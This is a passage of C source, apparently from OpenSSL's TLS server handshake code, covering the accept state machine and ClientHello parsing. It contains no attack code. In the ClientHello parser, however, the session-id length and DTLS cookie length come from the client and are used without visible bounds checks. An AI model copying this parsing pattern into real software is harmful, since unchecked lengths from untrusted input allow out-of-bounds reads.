SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_NO_CERTIFICATE_SET);
return(-1);
}
#ifndef OPENSSL_NO_HEARTBEATS
/* If we're awaiting a HeartbeatResponse, pretend we
* already got it and don't await it anymore, because
* Heartbeats don't make sense during handshakes anyway.
*/
if (s->tlsext_hb_pending)
{
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;)
{
state=s->state;
switch (s->state)
{
case SSL_ST_RENEGOTIATE:
s->renegotiate=1;
/* s->state=SSL_ST_ACCEPT; */
case SSL_ST_BEFORE:
case SSL_ST_ACCEPT:
case SSL_ST_BEFORE|SSL_ST_ACCEPT:
case SSL_ST_OK|SSL_ST_ACCEPT:
s->server=1;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_START,1);
if ((s->version>>8) != 3)
{
SSLerr(SSL_F_SSL3_ACCEPT, ERR_R_INTERNAL_ERROR);
return -1;
}
if (!ssl_security(s, SSL_SECOP_VERSION, 0,
s->version, NULL))
{
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_VERSION_TOO_LOW);
return -1;
}
s->type=SSL_ST_ACCEPT;
if (s->init_buf == NULL)
{
if ((buf=BUF_MEM_new()) == NULL)
{
ret= -1;
goto end;
}
if (!BUF_MEM_grow(buf,SSL3_RT_MAX_PLAIN_LENGTH))
{
BUF_MEM_free(buf);
ret= -1;
goto end;
}
s->init_buf=buf;
}
if (!ssl3_setup_buffers(s))
{
ret= -1;
goto end;
}
s->init_num=0;
s->s3->flags &= ~TLS1_FLAGS_SKIP_CERT_VERIFY;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/* Should have been reset by ssl3_get_finished, too. */
s->s3->change_cipher_spec = 0;
if (s->state != SSL_ST_RENEGOTIATE)
{
/* Ok, we now need to push on a buffering BIO so that
* the output is sent in a way that TCP likes :-)
*/
if (!ssl_init_wbio_buffer(s,1)) { ret= -1; goto end; }
ssl3_init_finished_mac(s);
s->state=SSL3_ST_SR_CLNT_HELLO_A;
s->ctx->stats.sess_accept++;
}
else if (!s->s3->send_connection_binding &&
!(s->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION))
{
/* Server attempting to renegotiate with
* client that doesn't support secure
* renegotiation.
*/
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_HANDSHAKE_FAILURE);
ret = -1;
goto end;
}
else
{
/* s->state == SSL_ST_RENEGOTIATE,
* we will just send a HelloRequest */
s->ctx->stats.sess_accept_renegotiate++;
s->state=SSL3_ST_SW_HELLO_REQ_A;
}
break;
case SSL3_ST_SW_HELLO_REQ_A:
case SSL3_ST_SW_HELLO_REQ_B:
s->shutdown=0;
ret=ssl3_send_hello_request(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SW_HELLO_REQ_C;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
ssl3_init_finished_mac(s);
break;
case SSL3_ST_SW_HELLO_REQ_C:
s->state=SSL_ST_OK;
break;
case SSL3_ST_SR_CLNT_HELLO_A:
case SSL3_ST_SR_CLNT_HELLO_B:
case SSL3_ST_SR_CLNT_HELLO_C:
ret=ssl3_get_client_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_SRP
s->state = SSL3_ST_SR_CLNT_HELLO_D;
case SSL3_ST_SR_CLNT_HELLO_D:
{
int al;
if ((ret = ssl_check_srp_ext_ClientHello(s,&al)) < 0)
{
/* callback indicates further work to be done */
s->rwstate=SSL_X509_LOOKUP;
goto end;
}
if (ret != SSL_ERROR_NONE)
{
ssl3_send_alert(s,SSL3_AL_FATAL,al);
/* This is not really an error, but the only means
for a client to detect whether SRP is supported. */
if (al != TLS1_AD_UNKNOWN_PSK_IDENTITY)
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_CLIENTHELLO_TLSEXT);
ret = SSL_TLSEXT_ERR_ALERT_FATAL;
ret= -1;
goto end;
}
}
#endif
s->renegotiate = 2;
s->state=SSL3_ST_SW_SRVR_HELLO_A;
s->init_num=0;
break;
case SSL3_ST_SW_SRVR_HELLO_A:
case SSL3_ST_SW_SRVR_HELLO_B:
ret=ssl3_send_server_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->hit)
{
if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
else
s->state=SSL3_ST_SW_CHANGE_A;
}
#else
if (s->hit)
s->state=SSL3_ST_SW_CHANGE_A;
#endif
else
s->state = SSL3_ST_SW_CERT_A;
s->init_num = 0;
break;
case SSL3_ST_SW_CERT_A:
case SSL3_ST_SW_CERT_B:
/* Check if it is anon DH or anon ECDH,
 * normal PSK or KRB5 or SRP */
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aKRB5|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
ret=ssl3_send_server_certificate(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state=SSL3_ST_SW_CERT_STATUS_A;
else
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
else
{
skip = 1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
#else
}
else
skip=1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
#endif
s->init_num=0;
break;
case SSL3_ST_SW_KEY_EXCH_A:
case SSL3_ST_SW_KEY_EXCH_B:
alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
/*
* clear this, it may get reset by
* send_server_key_exchange
*/
s->s3->tmp.use_rsa_tmp=0;
/* only send a ServerKeyExchange for a DH key exchange, fortezza, or
* RSA where we only have a signing certificate
*
* PSK: may send PSK identity hints
*
* For ECC ciphersuites, we send a serverKeyExchange
* message only if the cipher suite is either
* ECDH-anon or ECDHE. In other cases, the
* server certificate contains the server's
* public key for key exchange.
*/
if (0
/* PSK: send ServerKeyExchange if a PSK identity
* hint is provided */
#ifndef OPENSSL_NO_PSK
|| ((alg_k & SSL_kPSK) && s->ctx->psk_identity_hint)
#endif
#ifndef OPENSSL_NO_SRP
/* SRP: send ServerKeyExchange */
|| (alg_k & SSL_kSRP)
#endif
|| (alg_k & SSL_kDHE)
|| (alg_k & SSL_kECDHE)
|| ((alg_k & SSL_kRSA)
&& (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL
|| (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)
&& EVP_PKEY_size(s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)
)
)
)
)
{
ret=ssl3_send_server_key_exchange(s);
if (ret <= 0) goto end;
}
else
skip=1;
s->state=SSL3_ST_SW_CERT_REQ_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_REQ_A:
case SSL3_ST_SW_CERT_REQ_B:
if (/* don't request cert unless asked for it: */
!(s->verify_mode & SSL_VERIFY_PEER) ||
/* if SSL_VERIFY_CLIENT_ONCE is set,
* don't request cert during re-negotiation: */
((s->session->peer != NULL) &&
(s->verify_mode & SSL_VERIFY_CLIENT_ONCE)) ||
/* never request cert in anonymous ciphersuites
* (see section "Certificate request" in SSL 3 drafts
* and in RFC 2246): */
((s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
/* ... except when the application insists on verification
* (against the specs, but s3_clnt.c accepts this for SSL 3) */
!(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) ||
/* never request cert in Kerberos ciphersuites */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) ||
/* don't request certificate for SRP auth */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aSRP)
/* With normal PSK Certificates and
* Certificate Requests are omitted */
|| (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
/* no cert request */
skip=1;
s->s3->tmp.cert_request=0;
s->state=SSL3_ST_SW_SRVR_DONE_A;
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
s->s3->tmp.cert_request=1;
ret=ssl3_send_certificate_request(s);
if (ret <= 0) goto end;
#ifndef NETSCAPE_HANG_BUG
s->state=SSL3_ST_SW_SRVR_DONE_A;
#else
s->state=SSL3_ST_SW_FLUSH;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
#endif
s->init_num=0;
}
break;
case SSL3_ST_SW_SRVR_DONE_A:
case SSL3_ST_SW_SRVR_DONE_B:
ret=ssl3_send_server_done(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
break;
case SSL3_ST_SW_FLUSH:
/* This code originally checked to see if
* any data was pending using BIO_CTRL_INFO
* and then flushed. This caused problems
* as documented in PR#1939. The proposed
* fix doesn't completely resolve this issue
* as buggy implementations of BIO_CTRL_PENDING
* still exist. So instead we just flush
* unconditionally.
*/
s->rwstate=SSL_WRITING;
if (BIO_flush(s->wbio) <= 0)
{
ret= -1;
goto end;
}
s->rwstate=SSL_NOTHING;
s->state=s->s3->tmp.next_state;
break;
case SSL3_ST_SR_CERT_A:
case SSL3_ST_SR_CERT_B:
if (s->s3->tmp.cert_request)
{
ret=ssl3_get_client_certificate(s);
if (ret <= 0) goto end;
}
s->init_num=0;
s->state=SSL3_ST_SR_KEY_EXCH_A;
break;
case SSL3_ST_SR_KEY_EXCH_A:
case SSL3_ST_SR_KEY_EXCH_B:
ret=ssl3_get_client_key_exchange(s);
if (ret <= 0)
goto end;
if (ret == 2)
{
/* For the ECDH ciphersuites when
* the client sends its ECDH pub key in
* a certificate, the CertificateVerify
* message is not sent.
* Also for GOST ciphersuites when
* the client uses its key from the certificate
* for key exchange.
*/
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num = 0;
}
else if (SSL_USE_SIGALGS(s))
{
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
if (!s->session->peer)
break;
/* For sigalgs freeze the handshake buffer
* at this point and digest cached records.
*/
if (!s->s3->handshake_buffer)
{
SSLerr(SSL_F_SSL3_ACCEPT,ERR_R_INTERNAL_ERROR);
return -1;
}
s->s3->flags |= TLS1_FLAGS_KEEP_HANDSHAKE;
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
int offset=0;
int dgst_num;
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
/* We need to get the hashes here so that, if there is
* a client cert, it can be verified.
* FIXME - digest processing for CertificateVerify
* should be generalized; that is a next step.
*/
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
for (dgst_num=0; dgst_num<SSL_MAX_DIGEST;dgst_num++)
if (s->s3->handshake_dgst[dgst_num])
{
int dgst_size;
s->method->ssl3_enc->cert_verify_mac(s,EVP_MD_CTX_type(s->s3->handshake_dgst[dgst_num]),&(s->s3->tmp.cert_verify_md[offset]));
dgst_size=EVP_MD_CTX_size(s->s3->handshake_dgst[dgst_num]);
if (dgst_size < 0)
{
ret = -1;
goto end;
}
offset+=dgst_size;
}
}
break;
case SSL3_ST_SR_CERT_VRFY_A:
case SSL3_ST_SR_CERT_VRFY_B:
/*
* This *should* be the first time we enable CCS, but be
* extra careful about surrounding code changes. We need
* to set this here because we don't know if we're
* expecting a CertificateVerify or not.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
/* we should decide if we expected this one */
ret=ssl3_get_cert_verify(s);
if (ret <= 0) goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num=0;
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_SR_NEXT_PROTO_A:
case SSL3_ST_SR_NEXT_PROTO_B:
/*
* Enable CCS for resumed handshakes with NPN.
* In a full handshake with NPN, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so make
* sure not to re-enable it to ban duplicates.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_next_proto(s);
if (ret <= 0) goto end;
s->init_num = 0;
s->state=SSL3_ST_SR_FINISHED_A;
break;
#endif
case SSL3_ST_SR_FINISHED_A:
case SSL3_ST_SR_FINISHED_B:
/*
* Enable CCS for resumed handshakes without NPN.
* In a full handshake, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so make
* sure not to re-enable it to ban duplicates.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_finished(s,SSL3_ST_SR_FINISHED_A,
SSL3_ST_SR_FINISHED_B);
if (ret <= 0) goto end;
if (s->hit)
s->state=SSL_ST_OK;
#ifndef OPENSSL_NO_TLSEXT
else if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
#endif
else
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_SW_SESSION_TICKET_A:
case SSL3_ST_SW_SESSION_TICKET_B:
ret=ssl3_send_newsession_ticket(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_STATUS_A:
case SSL3_ST_SW_CERT_STATUS_B:
ret=ssl3_send_cert_status(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_KEY_EXCH_A;
s->init_num=0;
break;
#endif
case SSL3_ST_SW_CHANGE_A:
case SSL3_ST_SW_CHANGE_B:
s->session->cipher=s->s3->tmp.new_cipher;
if (!s->method->ssl3_enc->setup_key_block(s))
{ ret= -1; goto end; }
ret=ssl3_send_change_cipher_spec(s,
SSL3_ST_SW_CHANGE_A,SSL3_ST_SW_CHANGE_B);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FINISHED_A;
s->init_num=0;
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_SERVER_WRITE))
{
ret= -1;
goto end;
}
break;
case SSL3_ST_SW_FINISHED_A:
case SSL3_ST_SW_FINISHED_B:
ret=ssl3_send_finished(s,
SSL3_ST_SW_FINISHED_A,SSL3_ST_SW_FINISHED_B,
s->method->ssl3_enc->server_finished_label,
s->method->ssl3_enc->server_finished_label_len);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FLUSH;
if (s->hit)
{
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
{
s->s3->tmp.next_state=SSL3_ST_SR_NEXT_PROTO_A;
}
else
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#endif
}
else
s->s3->tmp.next_state=SSL_ST_OK;
s->init_num=0;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
BUF_MEM_free(s->init_buf);
s->init_buf=NULL;
/* remove buffering on output */
ssl_free_wbio_buffer(s);
s->init_num=0;
if (s->renegotiate == 2) /* skipped if we just sent a HelloRequest */
{
s->renegotiate=0;
s->new_session=0;
ssl_update_cache(s,SSL_SESS_CACHE_SERVER);
s->ctx->stats.sess_accept_good++;
/* s->server=1; */
s->handshake_func=ssl3_accept;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_DONE,1);
}
ret = 1;
goto end;
/* break; */
default:
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_UNKNOWN_STATE);
ret= -1;
goto end;
/* break; */
}
if (!s->s3->tmp.reuse_message && !skip)
{
if (s->debug)
{
if ((ret=BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state))
{
new_state=s->state;
s->state=state;
cb(s,SSL_CB_ACCEPT_LOOP,1);
s->state=new_state;
}
}
skip=0;
}
end:
/* BIO_flush(s->wbio); */
s->in_handshake--;
if (cb != NULL)
cb(s,SSL_CB_ACCEPT_EXIT,ret);
return(ret);
}
int ssl3_send_hello_request(SSL *s)
{
if (s->state == SSL3_ST_SW_HELLO_REQ_A)
{
ssl_set_handshake_header(s, SSL3_MT_HELLO_REQUEST, 0);
s->state=SSL3_ST_SW_HELLO_REQ_B;
}
/* SSL3_ST_SW_HELLO_REQ_B */
return ssl_do_write(s);
}
int ssl3_get_client_hello(SSL *s)
{
int i,j,ok,al=SSL_AD_INTERNAL_ERROR,ret= -1;
unsigned int cookie_len;
long n;
unsigned long id;
unsigned char *p,*d;
SSL_CIPHER *c;
#ifndef OPENSSL_NO_COMP
unsigned char *q;
SSL_COMP *comp=NULL;
#endif
STACK_OF(SSL_CIPHER) *ciphers=NULL;
if (s->state == SSL3_ST_SR_CLNT_HELLO_C && !s->first_packet)
goto retry_cert;
/* We do this so that we will respond with our native type.
* If we are TLSv1 and we get SSLv3, we will respond with TLSv1,
* This down switching should be handled by a different method.
* If we are SSLv3, we will respond with SSLv3, even if prompted with
* TLSv1.
*/
if (s->state == SSL3_ST_SR_CLNT_HELLO_A
)
{
s->state=SSL3_ST_SR_CLNT_HELLO_B;
}
s->first_packet=1;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CLNT_HELLO_B,
SSL3_ST_SR_CLNT_HELLO_C,
SSL3_MT_CLIENT_HELLO,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
s->first_packet=0;
d=p=(unsigned char *)s->init_msg;
/* use version from inside client hello, not from record header
* (may differ: see RFC 2246, Appendix E, second paragraph) */
s->client_version=(((int)p[0])<<8)|(int)p[1];
p+=2;
if (SSL_IS_DTLS(s) ? (s->client_version > s->version &&
s->method->version != DTLS_ANY_VERSION)
: (s->client_version < s->version))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
if ((s->client_version>>8) == SSL3_VERSION_MAJOR &&
!s->enc_write_ctx && !s->write_hash)
{
/* similar to ssl3_get_record, send alert using remote version number */
s->version = s->client_version;
}
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
/* If we require cookies and this ClientHello doesn't
* contain one, just return since we do not want to
* allocate any memory yet. So check cookie length...
*/
if (SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE)
{
unsigned int session_length, cookie_length;
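/* Peek at the one-byte session id length and, past the session id,
 * the one-byte cookie length, without consuming any input. */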
session_length = *(p + SSL3_RANDOM_SIZE);
cookie_length = *(p + SSL3_RANDOM_SIZE + session_length + 1);
if (cookie_length == 0)
return 1;
}
/* load the client random */
memcpy(s->s3->client_random,p,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/* get the session-id */
j= *(p++);
s->hit=0;
/* Versions before 0.9.7 always allow clients to resume sessions in renegotiation.
* 0.9.7 and later allow this by default, but optionally ignore resumption requests
* with flag SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (it's a new flag rather
* than a change to default behavior so that applications relying on this for security
* won't even compile against older library versions).
*
* 1.0.1 and later also have a function SSL_renegotiate_abbreviated() to request
* renegotiation but not a new session (s->new_session remains unset): for servers,
* this essentially just means that the SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
* setting will be ignored.
*/
if ((s->new_session && (s->options & SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION)))
{
if (!ssl_get_new_session(s,1))
goto err;
}
else
{
i=ssl_get_prev_session(s, p, j, d + n);
/*
* Only resume if the session's version matches the negotiated
* version.
* RFC 5246 does not provide much useful advice on resumption
* with a different protocol version. It doesn't forbid it but
* the sanity of such behaviour would be questionable.
* In practice, clients do not accept a version mismatch and
* will abort the handshake with an error.
*/
if (i == 1 && s->version == s->session->ssl_version)
{ /* previous session */
s->hit=1;
}
else if (i == -1)
goto err;
else /* i == 0 */
{
if (!ssl_get_new_session(s,1))
goto err;
}
}
p+=j;
if (SSL_IS_DTLS(s))
{
/* cookie stuff */
cookie_len = *(p++);
/*
* The ClientHello may contain a cookie even if the
* HelloVerify message has not been sent--make sure that it
* does not cause an overflow.
*/
if ( cookie_len > sizeof(s->d1->rcvd_cookie))
{
/* too much data */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* verify the cookie if appropriate option is set. */
if ((SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE) &&
cookie_len > 0)
{
memcpy(s->d1->rcvd_cookie, p, cookie_len);
if ( s->ctx->app_verify_cookie_cb != NULL)
{
if ( s->ctx->app_verify_cookie_cb(s, s->d1->rcvd_cookie,
cookie_len) == 0)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* else cookie verification succeeded */
}
else if ( memcmp(s->d1->rcvd_cookie, s->d1->cookie,
s->d1->cookie_len) != 0) /* default verification */
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* Set to -2 so if successful we return 2 */
ret = -2;
}
p += cookie_len;
if (s->method->version == DTLS_ANY_VERSION)
{
/* Select version to use */
if (s->client_version <= DTLS1_2_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1_2))
{
s->version = DTLS1_2_VERSION;
s->method = DTLSv1_2_server_method();
}
else if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
else if (s->client_version <= DTLS1_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1))
{
s->version = DTLS1_VERSION;
s->method = DTLSv1_server_method();
}
else
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
s->session->ssl_version = s->version;
}
}
n2s(p,i);
if ((i == 0) && (j != 0))
{
/* we need a cipher if we are not resuming a session */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_SPECIFIED);
goto f_err;
}
if ((p+i) >= (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if ((i > 0) && (ssl_bytes_to_cipher_list(s,p,i,&(ciphers))
== NULL))
{
goto err;
}
p+=i;
/* If it is a hit, check that the cipher is in the list */
if ((s->hit) && (i > 0))
{
j=0;
id=s->session->cipher->id;
#ifdef CIPHER_DEBUG
fprintf(stderr,"client sent %d ciphers\n",sk_SSL_CIPHER_num(ciphers));
#endif
for (i=0; i<sk_SSL_CIPHER_num(ciphers); i++)
{
c=sk_SSL_CIPHER_value(ciphers,i);
#ifdef CIPHER_DEBUG
fprintf(stderr,"client [%2d of %2d]:%s\n",
i,sk_SSL_CIPHER_num(ciphers),
SSL_CIPHER_get_name(c));
#endif
if (c->id == id)
{
j=1;
break;
}
}
/* Disabled because it can be used in a ciphersuite downgrade
* attack: CVE-2010-4180.
*/
#if 0
if (j == 0 && (s->options & SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG) && (sk_SSL_CIPHER_num(ciphers) == 1))
{
/* Special case as client bug workaround: the previously used cipher may
* not be in the current list, the client instead might be trying to
* continue using a cipher that before wasn't chosen due to server
* preferences. We'll have to reject the connection if the cipher is not
* enabled, though. */
c = sk_SSL_CIPHER_value(ciphers, 0);
if (sk_SSL_CIPHER_find(SSL_get_ciphers(s), c) >= 0)
{
s->session->cipher = c;
j = 1;
}
}
#endif
if (j == 0)
{
/* we need to have the cipher in the cipher
* list if we are asked to reuse it */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_CIPHER_MISSING);
goto f_err;
}
}
/* compression */
i= *(p++);
if ((p+i) > (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
#ifndef OPENSSL_NO_COMP
q=p;
#endif
for (j=0; j<i; j++)
{
if (p[j] == 0) break;
}
p+=i;
if (j >= i)
{
/* no compress */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_COMPRESSION_SPECIFIED);
goto f_err;
}
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (s->version >= SSL3_VERSION)
{
if (!ssl_parse_clienthello_tlsext(s,&p,d,n))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_PARSE_TLSEXT);
goto err;
}
}
/* Check if we want to use an external pre-shared secret for this
* handshake, for non-reused sessions only. We need to generate
* server_random before calling tls_session_secret_cb in order to allow
* SessionTicket processing to use it in key derivation. */
{
unsigned char *pos;
pos=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, pos, SSL3_RANDOM_SIZE) <= 0)
{
goto f_err;
}
}
if (!s->hit && s->version >= TLS1_VERSION && s->tls_session_secret_cb)
{
SSL_CIPHER *pref_cipher=NULL;
s->session->master_key_length=sizeof(s->session->master_key);
if(s->tls_session_secret_cb(s, s->session->master_key, &s->session->master_key_length,
ciphers, &pref_cipher, s->tls_session_secret_cb_arg))
{
s->hit=1;
s->session->ciphers=ciphers;
s->session->verify_result=X509_V_OK;
ciphers=NULL;
/* check if some cipher was preferred by call back */
pref_cipher=pref_cipher ? pref_cipher : ssl3_choose_cipher(s, s->session->ciphers, SSL_get_ciphers(s));
if (pref_cipher == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->session->cipher=pref_cipher;
if (s->cipher_list)
sk_SSL_CIPHER_free(s->cipher_list);
if (s->cipher_list_by_id)
sk_SSL_CIPHER_free(s->cipher_list_by_id);
s->cipher_list = sk_SSL_CIPHER_dup(s->session->ciphers);
s->cipher_list_by_id = sk_SSL_CIPHER_dup(s->session->ciphers);
}
}
#endif
/* Worst case, we will use the NULL compression, but if we have other
* options, we will now look for them. We have i-1 compression
* algorithms from the client, starting at q. */
s->s3->tmp.new_compression=NULL;
#ifndef OPENSSL_NO_COMP
/* This only happens if we have a cache hit */
if (s->session->compress_meth != 0)
{
int m, comp_id = s->session->compress_meth;
/* Perform sanity checks on resumed compression algorithm */
/* Can't disable compression */
if (!ssl_allow_compression(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
/* Look for resumed compression method */
for (m = 0; m < sk_SSL_COMP_num(s->ctx->comp_methods); m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
if (comp_id == comp->id)
{
s->s3->tmp.new_compression=comp;
break;
}
}
if (s->s3->tmp.new_compression == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INVALID_COMPRESSION_ALGORITHM);
goto f_err;
}
/* Look for resumed method in compression list */
for (m = 0; m < i; m++)
{
if (q[m] == comp_id)
break;
}
if (m >= i)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING);
goto f_err;
}
}
else if (s->hit)
comp = NULL;
else if (ssl_allow_compression(s) && s->ctx->comp_methods)
{ /* See if we have a match */
int m,nn,o,v,done=0;
nn=sk_SSL_COMP_num(s->ctx->comp_methods);
for (m=0; m<nn; m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
v=comp->id;
for (o=0; o<i; o++)
{
if (v == q[o])
{
done=1;
break;
}
}
if (done) break;
}
if (done)
s->s3->tmp.new_compression=comp;
else
comp=NULL;
}
#else
/* If compression is disabled we'd better not try to resume a session
* using compression.
*/
if (s->session->compress_meth != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
#endif
/* Given s->session->ciphers and SSL_get_ciphers, we must
* pick a cipher */
if (!s->hit)
{
#ifdef OPENSSL_NO_COMP
s->session->compress_meth=0;
#else
s->session->compress_meth=(comp == NULL)?0:comp->id;
#endif
if (s->session->ciphers != NULL)
